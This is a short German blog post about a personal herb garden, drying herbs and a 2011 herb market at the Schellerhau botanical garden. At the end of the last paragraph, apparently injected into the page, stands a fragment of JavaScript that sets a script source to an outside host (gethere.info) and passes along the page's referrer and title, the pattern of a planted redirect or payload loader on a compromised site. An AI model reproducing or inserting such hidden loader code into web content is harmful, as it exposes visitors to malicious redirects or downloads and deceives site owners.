Sommerzeit ist Kräuterzeit

Kräuterbeet

mit diesem Titel möchte ich Sie ab jetzt hin und wieder mit Informationen rund um Garten, Kräuter und Tee neugierig machen, aber auch anregen sich mit diesem interessanten Thema auch einmal selbst zu befassen.

Vor zwei Jahren habe ich mein erstes Kräuterbeet angelegt und ich habe es bis heute nicht bereut. Bei mir gibt es mehrjährige Kräuter wie Pfefferminze, Majoran, Bohnenkraut, Liebstöckel, Zitronenmelisse, Thymian, Oregano, Schnittlauch, Salbei und Lavendel genauso neben einjährigen Kräutern wie zum Beispiel Rosmarin und Basilikum. Die Kräuter werden frisch verarbeitet, was am gesündesten ist (z. B.: für frischen Pfefferminztee) aber auch getrocknet für die Küche im Winterhalbjahr.

Als aktuellen Tipp zu Kräutern kann ich den Kräutermarkt im Botanischen Garten in Schellerhau im Osterzgebirge empfehlen. Dort kann man Kräuter käuflich erwerben und dabei  jede Menge Interessantes und Wissenswertes zum Thema Kräuter erfahren. In diesem Jahr findet er am 28.07.2011 statt.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Posted in Blog.

Hinterlasse eine Antwort